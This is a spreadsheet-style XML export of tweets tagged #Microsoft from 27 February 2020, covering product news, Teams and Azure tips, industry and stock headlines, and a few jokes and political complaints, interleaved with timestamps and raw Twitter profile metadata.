    <t>{'id': 982411422905778176, 'id_str': '982411422905778176', 'name': 'IndSamachar', 'screen_name': 'Indsamachar', 'location': 'India', 'description': 'The absolute truth is â€˜Aham Brahmasmiâ€™ rest all is relative and NEWS. News is News.We are here to help Deliver it ,not Stop it .', 'url': 'https://t.co/2jSk007qfT', 'entities': {'url': {'urls': [{'url': 'https://t.co/2jSk007qfT', 'expanded_url': 'http://www.indsamachar.com', 'display_url': 'indsamachar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4537, 'friends_count': 0, 'listed_count': 17, 'created_at': 'Sat Apr 07 00:15:10 +0000 2018', 'favourites_count': 537, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18398, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228567926594097152/d7TDSf0G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228567926594097152/d7TDSf0G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/982411422905778176/1576999969',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</si>
  <si>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09:15:01 +0000 2020</t>
  </si>
  <si>
    <t>Do you really want a folding phone? No me neither ! Surface Duo phone peek feature leaked, prodding all other foldables https://t.co/yRLG9NqGX5 #microsoft #smartphone #devices #tech #future https://t.co/dllZP4IMNh</t>
  </si>
  <si>
    <t>Thu Feb 27 09:08:13 +0000 2020</t>
  </si>
  <si>
    <t>Dear community:
Can you tell me something regarding the Email Flow? Means that the self created email address is routable inside the MS Teams Office 365 Tenant? 
&amp;lt;xxxgroups.com@emea.teams.ms&amp;gt;
https://t.co/RF0Fx6hGdY
Thanks for an advice!
Best
Sascha
#Microsoft #M365 #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 09:07:46 +0000 2020</t>
  </si>
  <si>
    <t>How do you protect from the Insider Threat?  https://t.co/hDDR5TuVsh
#AccessManagement #Microsoft #ActiveDirectory #IdentityAccessManagement #tenfold #ITsecurity #Datasecurity https://t.co/LsWSMRuSZ6</t>
  </si>
  <si>
    <t>Thu Feb 27 09:05:40 +0000 2020</t>
  </si>
  <si>
    <t>My article in Computerworld Norge - https://t.co/GhT7fAEq3o depicting idea of what is expected more in future from tech companies making artificial intelligence tools for everyone. 
https://t.co/3ft2KUznGW
#artificialintelligence #oslo #norway #microsoft #PowerPlatform</t>
  </si>
  <si>
    <t>{'id': 775435567953838080, 'id_str': '775435567953838080', 'name': 'SUMIT SAH', 'screen_name': 'meetsumitsah', 'location': 'Oslo, Norway', 'description': 'The next stranger you meet in life has the key ðŸ”‘ to the treasure you are trying to unlock ðŸ˜Ž', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Mon Sep 12 20:47:01 +0000 2016', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1115226386472624128/pLuCw4i5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1115226386472624128/pLuCw4i5_normal.jpg',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</si>
  <si>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09:04:44 +0000 2020</t>
  </si>
  <si>
    <t>Attending Microsoft Ignite The Tour in Copenhagen today and tomorrow, if you are around let me know and lets catch up!
#MSIgniteTheTour #Microsoft #Copenhagen https://t.co/M2T5piMa3h</t>
  </si>
  <si>
    <t>{'id': 81835819, 'id_str': '81835819', 'name': 'Goran Vuksic', 'screen_name': 'gvuksic', 'location': 'Copenhagen, Denmark', 'description': 'solution architect, father, hitchhiker through the galaxy...', 'url': 'https://t.co/qcChUfda4Q', 'entities': {'url': {'urls': [{'url': 'https://t.co/qcChUfda4Q', 'expanded_url': 'https://www.linkedin.com/in/goranvuksic/', 'display_url': 'linkedin.com/in/goranvuksic/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 547, 'friends_count': 158, 'listed_count': 36, 'created_at': 'Mon Oct 12 12:58:37 +0000 2009', 'favourites_count': 894, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2983,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'http://pbs.twimg.com/profile_images/923828878103207936/d5k5WlAB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/923828878103207936/d5k5WlAB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/81835819/1509093168',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</si>
  <si>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Feb 27 09:01:14 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft engineer convicted of 18 felonies for digital currency fraud scam | ZDNet https://t.co/D2HdywRlQK #microsoft</t>
  </si>
  <si>
    <t>{'id': 1078310699523325952, 'id_str': '1078310699523325952', 'name': 'SeV Consulting', 'screen_name': 'SeVConsulting1', 'location': 'Cardiff and London', 'description': 'Sapientia et Veritas. Endeavouring to deliver wisdom and truth. A critical friend, a trusted partner. Independent Management, Digital and ICT Consultancy.', 'url': 'https://t.co/z0voNq9eDq', 'entities': {'url': {'urls': [{'url': 'https://t.co/z0voNq9eDq', 'expanded_url': 'https://sevconsulting.co', 'display_url': 'sevconsulting.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 245, 'friends_count': 200, 'listed_count': 4, 'created_at': 'Thu Dec 27 15:24:39 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1311,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'http://pbs.twimg.com/profile_images/1078311708698001408/oBXWpyUx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078311708698001408/oBXWpyUx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1078310699523325952/1545924554',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</si>
  <si>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09:00:55 +0000 2020</t>
  </si>
  <si>
    <t>Sums in OneNote: If you type a sum in #OneNote it will display the answer like a calculator. Try typing 12*12= followed by a space and 144 will appear. #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 09:00:42 +0000 2020</t>
  </si>
  <si>
    <t>Read my Feb 27 #Microsoft Newsletter featuring Microsoft's Xbox... https://t.co/NF7If3GNC8 Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Thu Feb 27 09:00:11 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/7LqrZWvLjc</t>
  </si>
  <si>
    <t>Thu Feb 27 08:58:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to soon reveal Universal Print, a cloud-based print infrastructure service that eliminates Print Servers - https://t.co/7ihpOUYbs2 #Microsoft #UniversalPrint</t>
  </si>
  <si>
    <t>Thu Feb 27 08:55:01 +0000 2020</t>
  </si>
  <si>
    <t>Sort of #BoringAI but very useful -  Use Azure Cognitive Services to automate forms processing https://t.co/AATNcnxjNJ #ai #ArtificialInteligence #azure #cloud #MachineLearning #microsoft https://t.co/4MhXA3px5Q</t>
  </si>
  <si>
    <t>Thu Feb 27 08:54:08 +0000 2020</t>
  </si>
  <si>
    <t>This does not only apply to #Microsoft - it's valid for almost every company: "5 ways Microsoft boosts engagement and internal culture" https://t.co/d0RQb5C5V5 /thx to @magrom</t>
  </si>
  <si>
    <t>Thu Feb 27 08:53:00 +0000 2020</t>
  </si>
  <si>
    <t>It's Day 2 of #FIAConference2020 in Brisbane! Chat with our experts Stephanus Natawardaja and Amanda Stenson if you want to know more about #Microsoft NFP Solutions and of course, win a special prize!
#BarheadSolutions #beingBarhead #nfp https://t.co/4LJaPiMEGB</t>
  </si>
  <si>
    <t>{'id': 909561756, 'id_str': '909561756', 'name': 'Barhead Solutions', 'screen_name': 'barhead', 'location': 'Sydney, New South Wales', 'description': 'Barhead is a Gold Microsoft partner specialising in cloud business solutions centered around CRM, field service, project service and employee management.', 'url': 'https://t.co/9d9OghDAAX', 'entities': {'url': {'urls': [{'url': 'https://t.co/9d9OghDAAX', 'expanded_url': 'http://www.barhead.com', 'display_url': 'barhead.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 251, 'friends_count': 513, 'listed_count': 11, 'created_at': 'Sun Oct 28 05:16:46 +0000 2012', 'favourites_count': 101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 361,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'http://pbs.twimg.com/profile_images/1135338322966933504/QdWulyK1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135338322966933504/QdWulyK1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/909561756/1559883376',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</si>
  <si>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Feb 27 08:52:18 +0000 2020</t>
  </si>
  <si>
    <t>Finchloom Launches Security Service 'PhishPrevent'  Using Technology, A.I. and Humans to Combat Hacking #SmallBusiness #Azure #Cloud #Microsoft #Office365 #Phishing #Security #ePRNews Finchloom https://t.co/WnGShkgQ5S</t>
  </si>
  <si>
    <t>{'id': 821027024416305153, 'id_str': '821027024416305153', 'name': 'ePRNews', 'screen_name': 'eprnews', 'location': '', 'description': 'ePRNews is global fastest growing Press Release Media outlet. Submit your #pressrelease #pr #news #industry #business #events #awards #announcement #funding ..', 'url': 'https://t.co/bfvzHkraIM', 'entities': {'url': {'urls': [{'url': 'https://t.co/bfvzHkraIM', 'expanded_url': 'http://eprnews.com', 'display_url': 'eprnews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2616, 'friends_count': 4802, 'listed_count': 24, 'created_at': 'Mon Jan 16 16:11:11 +0000 2017', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1503, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/821027855253393408/ZAT8jBN7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/821027855253393408/ZAT8jBN7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821027024416305153/1484583306',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</si>
  <si>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08:51:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft drops after #coronavirus-related outlook warning https://t.co/gMrHFrEJm4 #COVID19 #Covid_19 $MSFT</t>
  </si>
  <si>
    <t>{'id': 2517129042, 'id_str': '2517129042', 'name': 'Yoel Minkoff', 'screen_name': 'YoelMinkoff', 'location': '', 'description': 'Breaking news editor and writer of the Wall Street Breakfast at Seeking Alpha. Coverage focus on overnight and premarket stories. "Ready for the market open."', 'url': 'https://t.co/Ane4l3Xuew', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ane4l3Xuew', 'expanded_url': 'https://seekingalpha.com/author/wall-street-breakfast/articles#regular_articles', 'display_url': 'seekingalpha.com/author/wall-stâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4381, 'friends_count': 854, 'listed_count': 36, 'created_at': 'Fri May 23 07:05:22 +0000 2014', 'favourites_count': 164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11113,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'http://pbs.twimg.com/profile_images/1067438717894316033/HZ7Qr_qj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067438717894316033/HZ7Qr_qj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2517129042/1541977002', 'profile_link_color': '1DA1F2',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</si>
  <si>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08:49:56 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking to learn more about Cloud? Synergetics-Consulting is Making Cloud Learning Simpler!
Register Here: https://t.co/XJpg8KN5eB
#SynergeticsConsulting #CloudThursday #WebinarSeries #Session4 #Cost #Optimisation #Cloud #CloudComputing #Microsoft #Azure #Technology https://t.co/wSFf4cY8Bk</t>
  </si>
  <si>
    <t>Thu Feb 27 08:47:15 +0000 2020</t>
  </si>
  <si>
    <t>VM Checkpoints Names in the Hyper-V Manager Window... https://t.co/wdn1YQmBlv #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 08:46:40 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Apache Spark 3 with Scala - Hands On with Big Data! #udemycoupon -&amp;gt; https://t.co/BzLJwdVHE8
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Thu Feb 27 08:46:14 +0000 2020</t>
  </si>
  <si>
    <t>#Tech giants eye #SME segment to tap #Indias #cloud services market, says #GlobalData
https://t.co/Vt8leF7x1C
#Technology #Telecom #microsoft #google #airtel #jio</t>
  </si>
  <si>
    <t>{'id': 40051049, 'id_str': '40051049', 'name': 'GlobalDataTechnology', 'screen_name': 'Technology_GD', 'location': 'US â€“Europeâ€“MEA-AsiaPacific', 'description': 'A leading data and analytics company, providing market intelligence for Technology.  Press Office: pr@globaldata.com', 'url': 'https://t.co/x8VqnWyGss', 'entities': {'url': {'urls': [{'url': 'https://t.co/x8VqnWyGss', 'expanded_url': 'https://www.globaldata.com/', 'display_url': 'globaldata.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9788, 'friends_count': 5531, 'listed_count': 391, 'created_at': 'Thu May 14 18:15:24 +0000 2009', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18925, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2EFF2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/826030077095854080/A7Txtnaz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/826030077095854080/A7Txtnaz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40051049/1485767625', 'profile_link_color': 'A3BDC2', 'profile_sidebar_border_color': '86A4A6', 'profile_sidebar_fill_color': '827F82', 'profile_text_color': 'FCFCFC', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 08:45:08 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10's new icons are rolling out: This is what you'll see, says Microsoft | ZDNet #Windows10 #Microsoft https://t.co/HGGorR0KKF</t>
  </si>
  <si>
    <t>{'id': 201213559, 'id_str': '201213559', 'name': 'GMA Ltd', 'screen_name': 'GMAgregsays', 'location': 'London UK', 'description': 'IT support and technical solutions company.\n#Beckenham #London #Bromley #cybersecurity #computers #VoIP #TechNews\nhttps://t.co/YHHVpcE0eq', 'url': 'http://t.co/bRHMEVjfRj', 'entities': {'url': {'urls': [{'url': 'http://t.co/bRHMEVjfRj', 'expanded_url': 'http://www.gmal.co.uk', 'display_url': 'gmal.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/YHHVpcE0eq', 'expanded_url': 'http://facebook.com/GregoryMicallefAssociatesLtd/', 'display_url': 'facebook.com/GregoryMicalleâ€¦', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 336, 'friends_count': 1293, 'listed_count': 2, 'created_at': 'Mon Oct 11 10:40:27 +0000 2010', 'favourites_count': 434, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1657,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'http://pbs.twimg.com/profile_images/1146408978294935552/tSxGMTfJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146408978294935552/tSxGMTfJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/201213559/1496401214',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</si>
  <si>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08:45:06 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 08:45:03 +0000 2020</t>
  </si>
  <si>
    <t>There is no greater reward to effort ratio task than doing a 'find and replace' on someone's document to change their post-fullstop double spaces to single space.
"Word has completed it's search and made 6468 replacements"
From 3 clicks! Fuck you Steve.
#officelife #Microsoft</t>
  </si>
  <si>
    <t>{'id': 503322170, 'id_str': '503322170', 'name': 'The Flat Earth Scientist', 'screen_name': 'terminalwill', 'location': 'UK', 'description': 'Scientist and Flat Earth ambassador', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 227, 'listed_count': 1, 'created_at': 'Sat Feb 25 17:46:12 +0000 2012', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 134,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'http://pbs.twimg.com/profile_images/815519446966173696/q7Iz1vYy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/815519446966173696/q7Iz1vYy_normal.jpg',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</si>
  <si>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08:43:42 +0000 2020</t>
  </si>
  <si>
    <t>@singh_manwender @taapsee Heard what #Microsoft ceo satya nadella had  said about #CAA and #NRC. Why didn't you run a campaign boycott Microsoft? Why this hypocrisy!</t>
  </si>
  <si>
    <t>{'id': 898411787250352129, 'id_str': '898411787250352129', 'name': 'Whistle BlowerðŸ“¢', 'screen_name': 'India4everybody', 'location': '', 'description': 'Add up your hopes &amp; not your fears!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Fri Aug 18 05:10:36 +0000 2017', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 452, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/898414675188080641/WaifeKfU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/898414675188080641/WaifeKfU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/898411787250352129/1503033723',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</si>
  <si>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08:42:58 +0000 2020</t>
  </si>
  <si>
    <t>Dynamics 365 has took the business work by storm and the list of incentives is almost endless
In our recent article, we look at the three key benefits that underline how useful Dynamics 365 can be for the your company! - https://t.co/UpWcRrdFAE
#Microsoft #Dynamics365 #Business https://t.co/7B9sAU8H6l</t>
  </si>
  <si>
    <t>Thu Feb 27 08:42:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft just called and told me that my computer has been hacked and the hacker has been using it for the last months.
When I said that I'll just get a new one, he said that the whole #Internet is infected and if I get a new one, it'll have the same problem. https://t.co/mTWlLBXYZs</t>
  </si>
  <si>
    <t>{'id': 1083162842, 'id_str': '1083162842', 'name': 'Alexander Haffer', 'screen_name': 'AlexanderHaffer', 'location': 'ðŸŒ', 'description': ':)', 'url': 'https://t.co/HGVKii4gmM', 'entities': {'url': {'urls': [{'url': 'https://t.co/HGVKii4gmM', 'expanded_url': 'https://haffer.de/', 'display_url': 'haffer.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 36, 'listed_count': 10, 'created_at': 'Sat Jan 12 14:38:18 +0000 2013', 'favourites_count': 12037, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7614, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '202020', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226157915788251137/cKRTjMf__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226157915788251137/cKRTjMf__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1083162842/1565732886', 'profile_link_color': 'AA2904',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</si>
  <si>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Feb 27 08:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's Azure Sphere for IoT Devices Now Commercially Available.
The aim of Azure Sphere is to create an overall trusted environment for deploying and using IoT devices.
https://t.co/5HJEkwdyT9
#AzureSphere #IoT #Azure #Microsoft https://t.co/J3TD4m3R9I</t>
  </si>
  <si>
    <t>{'id': 3372878128, 'id_str': '3372878128', 'name': 'Mexa Solutions', 'screen_name': 'MexaSolutions', 'location': 'United Kingdom', 'description': 'The preferred choice in specialist Technology Recruitment. \n#recruitment #IT #software', 'url': 'https://t.co/Z0OVkCo7Pl', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z0OVkCo7Pl', 'expanded_url': 'http://www.mexasolutions.com', 'display_url': 'mexasolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 221, 'friends_count': 939, 'listed_count': 38, 'created_at': 'Sun Jul 12 20:11:39 +0000 2015', 'favourites_count': 113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 770,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'http://pbs.twimg.com/profile_images/1209074976814456832/rF5YgZ_a_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209074976814456832/rF5YgZ_a_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3372878128/1568111657',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</si>
  <si>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08:38:02 +0000 2020</t>
  </si>
  <si>
    <t>ICYM, #Microsoft released the official ISO image file of the #Windows10 20H1 preview build 19041. If you are a #WindowsInsiders, you can now download the ISO file to perform clean installation of the build https://t.co/Cbott4K1hi https://t.co/lqJbgsgv3S</t>
  </si>
  <si>
    <t>{'id': 29394479, 'id_str': '29394479', 'name': 'Kunal Chowdhury', 'screen_name': 'kunaldchowdhury', 'location': 'India', 'description': 'Microsoft MVP (2010-2018) | Windows Insider | Active Blogger @ https://t.co/ZY1lTs3ag7 | Author | Project Lead | The Technology Navigator', 'url': 'https://t.co/w7sTJfjZs5', 'entities': {'url': {'urls': [{'url': 'https://t.co/w7sTJfjZs5', 'expanded_url': 'https://www.kunal-chowdhury.com', 'display_url': 'kunal-chowdhury.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ZY1lTs3ag7', 'expanded_url': 'https://kunal-chowdhury.com', 'display_url': 'kunal-chowdhury.com', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 5814, 'friends_count': 1137, 'listed_count': 519, 'created_at': 'Tue Apr 07 05:48:23 +0000 2009', 'favourites_count': 2029, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45200,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'http://pbs.twimg.com/profile_images/1183006865828925443/vmTzduKr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183006865828925443/vmTzduKr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29394479/1572271967', 'profile_link_color': '1776B1', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '4A4A4A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 08:35:13 +0000 2020</t>
  </si>
  <si>
    <t>Are you a #dotnet #developer? Check out how @slorello integrated the relatively new #microsoft logging package into the @nexmodev SDK #csharp #apis https://t.co/iOqfbAANLi</t>
  </si>
  <si>
    <t>{'id': 16190869, 'id_str': '16190869', 'name': 'Ben Greenberg [ðŸ¥‘ðŸ‡®ðŸ‡±]', 'screen_name': 'RabbiGreenberg', 'location': 'Israel', 'description': 'ðŸ‘‹ Developer Advocate ðŸ¥‘ at @NexmoDev, Editor of @tech_torah, Moderator of #Rails at @thepracticaldevâœŒ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2529, 'friends_count': 649, 'listed_count': 118, 'created_at': 'Mon Sep 08 19:54:12 +0000 2008', 'favourites_count': 7719, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7273, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231513765235101696/tMI36veX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231513765235101696/tMI36veX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16190869/1549133409',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</si>
  <si>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08:35:01 +0000 2020</t>
  </si>
  <si>
    <t>How to send email to a channel in #Microsoft Teams - https://t.co/EhL15xwGDx @MicrosoftTeams @microsofteduk #edtech #edtechchat</t>
  </si>
  <si>
    <t>{'id': 1904184996, 'id_str': '1904184996', 'name': 'Mark Wilson', 'screen_name': 'SchoolsAppsTeam', 'location': 'Brighton, UK', 'description': 'ICT geek for education. Interested in MIS, tech n apps. Passionate about the effective use of technology and strategy in schools. Also a coffee addict.', 'url': 'https://t.co/6oU7kfwMlj', 'entities': {'url': {'urls': [{'url': 'https://t.co/6oU7kfwMlj', 'expanded_url': 'http://about.me/mrmarkwilson', 'display_url': 'about.me/mrmarkwilson', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1606, 'friends_count': 2141, 'listed_count': 325, 'created_at': 'Wed Sep 25 13:19:03 +0000 2013', 'favourites_count': 5514, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 17971,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'http://pbs.twimg.com/profile_images/1049978095803994113/8xkEHOgO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1049978095803994113/8xkEHOgO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1904184996/1569400675',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</si>
  <si>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08:34:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft joins Apple in scrapping outlooks on coronavirus https://t.co/y6F5VCCI9X via @IndianExpress
#Microsoft #coronavirus</t>
  </si>
  <si>
    <t>{'id': 841188317915828224, 'id_str': '841188317915828224', 'name': 'Mihir Kulkarni', 'screen_name': 'mihirhkulkarni1', 'location': 'Mumbai, Maharashtra, India', 'description': 'Future Digital Marketer. Love to Travel and Explore the New Places. I love to follow New Trends. Good Person Who Understands Situation and Handle it Patiently.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 191, 'listed_count': 0, 'created_at': 'Mon Mar 13 07:24:58 +0000 2017', 'favourites_count': 479, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 570,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'http://pbs.twimg.com/profile_images/1228209137126764547/Op5pBE-4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228209137126764547/Op5pBE-4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/841188317915828224/1489390610',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</si>
  <si>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08:33:43 +0000 2020</t>
  </si>
  <si>
    <t>It was a time when #Microsoft looks unbeatable but #Google killed them &amp;amp; @BillGates stopped Producing New Versions of #Windows .
One day will come when people will #Kill_Google due to their thirst for Money through unwanted Adds &amp;amp; Popups.</t>
  </si>
  <si>
    <t>{'id': 1135505195675242498, 'id_str': '1135505195675242498', 'name': 'à¤®à¥‹à¤ à¤¾_à¤­à¤¾à¤Š BIG BROTHER', 'screen_name': 'Motha_Bhau', 'location': '', 'description': 'Life is a journey and enjoying it without any expectations from our polititions  Daily Drinker ðŸ¥ƒðŸ¤— Follow on your Risk.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 52, 'listed_count': 0, 'created_at': 'Mon Jun 03 11:15:10 +0000 2019', 'favourites_count': 1652, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2324, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1193803254909558786/CRNJoFyO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193803254909558786/CRNJoFyO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1135505195675242498/1573459850',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</si>
  <si>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08:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Finchloom Launches Security Service 'PhishPrevent'  Using Technology, A.I. and Humans to Combat Hacking #SmallBusiness #Azure #Cloud #Microsoft #Office365 #Phishing #Security @eprnewscom @Finchloom 
https://t.co/GruhW8nJSq</t>
  </si>
  <si>
